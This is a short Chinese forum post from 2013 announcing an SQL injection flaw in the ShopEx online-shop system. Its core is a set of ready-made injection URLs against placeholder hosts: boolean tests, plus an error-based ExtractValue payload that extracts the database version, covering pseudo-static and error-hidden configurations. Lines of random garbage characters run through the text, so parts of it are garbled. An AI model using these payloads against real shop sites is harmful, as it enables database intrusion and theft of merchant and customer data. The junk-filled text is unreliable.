注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
1 H0 r/ f l; e* ^. O
, S; e- @4 q. u9 b5 \3 m) @好吧,我扯远了~~
! X7 a0 K$ C7 m6 d( {: d2 }7 ]其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~" ^2 X, d' x+ k1 o2 ]2 V T
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: ! A6 y- A9 U% |/ z# V7 y& }
/ H1 S# M- ?0 M( |! y) M+ _. }, uhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 8 Z4 K& B, \' Y
4 f% |5 ^6 e0 m4 k$ t) B. Uhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 2 t6 @2 H6 h7 I) O; `% F: M
& t$ u2 t, b; X% b5 @
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 5 P6 S5 w& z: K3 g
! m2 Q1 V& T% v6 K0 F( X8 R& D
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
* I: M9 H2 ^: F$ u; g8 P! B0 w0 f$ _! b, c2 }7 U) B5 z
3 `1 x( O6 @( C' A6 {5 R
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。6 m! X$ v/ p9 `% m+ w! o9 N. H& R
如何注入就不多说了,10多年的东西了…不会也会了…
4 a1 a8 u' r. [
- h a, }0 S# f) y& T8 F3 j
2 h7 {, a8 @. Q: u( N
2 [) ?: ?- B$ K# W6 ?. h7 H# w. N) B' N9 s: h
|
发表于 2013-2-19 08:31:27
收藏
支持
反对